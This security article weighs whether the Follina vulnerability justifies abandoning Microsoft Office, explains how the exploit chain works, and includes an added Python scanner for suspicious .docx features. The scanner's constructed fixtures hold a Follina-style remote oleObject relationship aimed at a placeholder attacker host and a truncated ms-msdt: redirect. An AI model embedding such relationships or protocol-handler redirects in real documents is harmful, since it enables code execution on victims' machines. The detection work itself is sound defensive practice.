Does Follina Mean It's Time to Abandon Microsoft Office? – Security Intelligence

Does Follina Mean It’s Time to Abandon Microsoft Office?
As a freelance writer, I spend most of my day working in Microsoft Word. Then, I send drafts to clients and companies across the globe. So, news of the newly discovered Microsoft Office vulnerability made me concerned about the possibility of accidentally spreading malware to my clients. I take extra precautions to ensure that I’m not introducing risk to my clients. Still, using Microsoft Office was something I did many times a day without a second thought.
I brought up the issue to a few of my clients. I was not the only one deciding if their company should abandon Microsoft Office for security reasons. The second question that came up was whether the other alternatives are actually safer. Like many things in business, the decision to use Microsoft Office comes down to a risk-versus-benefits decision.
At the end of May 2022, UK-based cybersecurity expert and threat researcher Kevin Beaumont analysed the sample and gave it the name Follina. Beaumont wrote that he picked the name because he found the number 0438 in the malicious code. That number is the area code of the Italian town Follina.
Follina, tracked as CVE-2022-30190, is a vulnerability in the Microsoft Support Diagnostic Tool (MSDT). A crafted Word document causes Office to invoke the ms-msdt: URL protocol handler, and MSDT then runs attacker-supplied commands with the user's privileges, with no macros involved. As WIRED explains, the vulnerability is delivered through altered Word documents: the attackers use social engineering to get a user to open the file, and the malicious code runs from there. One caveat practitioners should know: a Rich Text Format (.rtf) variant of the lure could trigger from the Windows Explorer preview pane, so the document did not even have to be opened.
The document loads a remote template, that is, a relationship inside the .docx package whose target is an external web server. The server returns an HTML file, and script in that HTML navigates to an ms-msdt: URI whose parameters cause MSDT to execute PowerShell. According to Microsoft, the attacker can then perform any action allowed by the user's rights: install programs, view data, change data, delete data or create new accounts. A practical consequence is that users running as standard (non-administrator) accounts limit the damage. Beaumont was especially concerned because Microsoft Defender for Endpoint did not detect the malicious code at the time.
Attackers were already exploiting the flaw in the wild. Follina was a zero-day vulnerability, meaning exploitation was under way before the vendor had a fix, so defenders had no patch to deploy. Beaumont also found evidence that the vulnerability existed in the fall of 2021 and that attackers used it in April 2022. Microsoft's interim guidance was to disable the ms-msdt: protocol handler by deleting the HKEY_CLASSES_ROOT\ms-msdt registry key (after exporting a backup copy). Microsoft released a patch on June 14, 2022, that fixed the vulnerability.
Follina is just the most recent example of vulnerabilities found in Microsoft products.
In 2018, criminals used three different Microsoft Office weaknesses, delivered through infected Word files, to spread the Zyklon malware: the Equation Editor flaw CVE-2017-11882, the .NET Framework flaw CVE-2017-8759 and the Dynamic Data Exchange (DDE) feature. Even at the bargain price of $75, the malware could be used for a wide range of attacks. It can steal credentials, spread malware, mine cryptocurrency and launch distributed denial-of-service attacks.
Attackers also embed macros in Word docs as a way to spread malware. In the past, they simply had to use a phishing scheme. Because macros ran with little friction, the malicious code would launch when the document opened and would then infect the system. Microsoft made it harder, first by requiring the user to click "Enable Content" and, since 2022, by blocking VBA macros by default in files that carry the Mark of the Web because they came from the internet. Attackers now use scare tactics, such as a decoy page claiming the document is protected and can only be read once content is enabled, to get users to turn on the macros, which then launch the malware.
In September 2021, Microsoft found malicious code spread through Word docs disguised as legal documents. In this case, the vulnerability (CVE-2021-40444, in the MSHTML browser engine) was one where the document could load a malicious ActiveX control. The number of attacks (in this case, fewer than 10) was low. Still, it illustrates the potential of a single vulnerability reachable from Microsoft Word.
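The three lure types described above, a remote relationship that fetches the Follina HTML stage, an embedded VBA project, and ActiveX control parts, all leave traces inside the .docx package itself, which is a ZIP of XML parts. The following scanner is an added example written for this page; it is not code from the article, from Microsoft or from any of the researchers named here. The sample documents and the HTML stage are constructed in memory (the host attacker.example is a placeholder, and the real MSDT parameters are deliberately not reproduced); the relationship types, part names and the ms-msdt: scheme are the real ones used by Office.

```python
"""Static triage of Office Open XML documents for the lure types discussed on this page.

Added example; constructed samples only. It checks three things a .docx/.docm can carry
without any exploit code of its own:
  1. relationships whose target lives outside the package (remote template / remote OLE
     object, the Follina delivery mechanism),
  2. a VBA project (macros),
  3. ActiveX control parts,
and separately flags Windows protocol-handler URIs (ms-msdt: and similar) in a fetched
HTML stage.
"""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "\\\\")  # web servers and UNC shares
# Protocol handlers abused for code execution from a browser/Office context.
URI_SCHEME_RE = re.compile(r"\b(ms-msdt|search-ms|ms-officecmd):", re.IGNORECASE)


def scan_docx(data: bytes) -> list[str]:
    """Return human-readable findings for one document supplied as bytes."""
    findings: list[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        names = pkg.namelist()
        for name in names:
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{REL_NS}Relationship"):
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                # Ordinary hyperlinks are external by design; everything else that
                # points off-package (oleObject, attachedTemplate, frame...) is suspect.
                if (rel.get("TargetMode") == "External"
                        and rtype != "hyperlink"
                        and target.lower().startswith(REMOTE_PREFIXES)):
                    findings.append(f"external relationship in {name}: {rtype} -> {target}")
        if "word/vbaProject.bin" in names:
            findings.append("VBA project present (macros)")
        if any(n.startswith("word/activeX/") for n in names):
            findings.append("ActiveX control parts present")
    return findings


def scan_html_stage(html: str) -> list[str]:
    """Return the protocol-handler schemes referenced by a fetched HTML stage."""
    return sorted({m.group(1).lower() + ":" for m in URI_SCHEME_RE.finditer(html)})


def build_docx(extra_files: dict[str, bytes], extra_rels: str = "") -> bytes:
    """Build a minimal, constructed .docx package in memory (not a real Word file)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
        'relationships/styles" Target="styles.xml"/>' + extra_rels + "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("word/document.xml",
                     '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                     "<w:body/></w:document>")
        pkg.writestr("word/_rels/document.xml.rels", rels)
        for name, content in extra_files.items():
            pkg.writestr(name, content)
    return buf.getvalue()


# Constructed samples. attacker.example is a placeholder host, not a real indicator.
FOLLINA_STYLE_REL = (
    '<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/oleObject" Target="http://attacker.example/stage.html!" TargetMode="External"/>'
)
HYPERLINK_REL = (
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/hyperlink" Target="https://www.example.com/" TargetMode="External"/>'
)
CLEAN_DOCX = build_docx({})
HYPERLINK_DOCX = build_docx({}, HYPERLINK_REL)
REMOTE_DOCX = build_docx({}, FOLLINA_STYLE_REL)
MACRO_DOCX = build_docx({"word/vbaProject.bin": b"\xd0\xcf\x11\xe0 placeholder"})
ACTIVEX_DOCX = build_docx({"word/activeX/activeX1.xml": b"<ax:ocx/>"})
# Constructed second stage: the shape of the Follina HTML without its real parameters.
STAGE_HTML = (
    "<html><body><script>\n"
    "window.location.href = 'ms-msdt:/id PCWDiagnostic /skip force /param \"...\"';\n"
    "</script></body></html>"
)

if __name__ == "__main__":
    for label, doc in [("clean", CLEAN_DOCX), ("hyperlink-only", HYPERLINK_DOCX),
                       ("remote-object", REMOTE_DOCX), ("macro", MACRO_DOCX),
                       ("activex", ACTIVEX_DOCX)]:
        print(f"{label:14s} {scan_docx(doc) or 'no findings'}")
    print("html stage     ", scan_html_stage(STAGE_HTML))
```

The relationship check deliberately ignores hyperlinks, which are external by design, so the scanner stays quiet on ordinary documents and fires only on off-package OLE objects, templates and frames. None of these findings proves a document is malicious; a remote template or a macro can be legitimate. They are triage signals for a mail gateway or sandbox that tell an analyst which attachments deserve a closer look, and the HTML check is the point at which to apply the same scrutiny to whatever such a document fetches.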
Attackers often look for the easiest way to cause the most damage. Microsoft Office documents are the most popular work solution. So, threat actors view Microsoft Office as an easy way to spread malicious code and malware. 
With more businesses having turned to Office 365 in recent years, the products are even more attractive. According to Vectra’s Office 365 Security Takeaways E-book, 97% of business decision-makers reported that their organizations extended use of Microsoft 365 as a result of the pandemic. With more people using Microsoft Office products than ever before, Microsoft products are likely to continue to be a popular vehicle for malware and other digital threats.
Microsoft Office documents, especially Word (.doc, .docx) and Excel (.xlsx) files, are used for many different purposes, both work and personal. You may get an Excel file detailing the budget for a nonprofit group, an invoice or even a spouse sending you a draft monthly budget. Word files also run the gamut of uses: flyers for a local play, a letter from a family member or a schedule for an upcoming event.
With all of these different types of documents, it is relatively easy for attackers to build a social engineering scheme around an Office file that many people will fall for. For example, a phishing email with "Invoice" or "Budget" as the subject line is generic enough that at least some recipients will open it, since they may genuinely be expecting someone to send an invoice or a budget.
With criminals specifically turning to Microsoft products for their next big attack, many companies wonder if they should find another solution. Yes, there are alternate tools — Google Workspace and Apple iWork — that are not currently as popular with attackers. But is that really the right answer, especially since they will likely be targeted more if organizations make a mass switch?
For many enterprises that use all Microsoft products, switching would not be easy. Their processes and file systems are centered on Office 365, including other products such as Teams and OneDrive. It is very likely that the effort involved in a switch would not be worth the reduced risk, especially since Google and Apple products do not offer the same level of productivity and integrated tooling as Microsoft.
Instead of switching products, which likely will have minimal positive effects, organizations should focus on reducing risks and vulnerabilities across the board, regardless of the vehicle criminals use to spread malicious files. By instead focusing on employee training and creating a culture of cybersecurity, organizations can reduce the odds that an employee will fall for a phishing scheme.
Organizations are also turning to zero trust, a security framework that reduces risk, especially with a remote or hybrid workforce. Many of the techniques that are part of zero trust reduce either the likelihood or the impact of an attack. Multi-factor authentication blunts attacks that rely on stolen credentials. Running users under least-privilege accounts caps what a document-borne payload can do, since, as Microsoft's Follina advisory notes, the attacker gets only the rights of the user who opened the file. Micro-segmentation limits how far an attacker can move even if an employee does open a malicious file.
It’s easy to focus on the latest vehicle for attacks. However, threat actors try to stay one step ahead and constantly change their schemes and vehicles. By instead focusing on reducing your overall risk and vulnerability, regardless of the specifics of the attack, your organization can make more progress by improving cybersecurity rather than by switching tools.
Jennifer Goforth Gregory is a freelance B2B technology content marketing writer specializing in cybersecurity. Other areas of focus include B2B, finance, tec…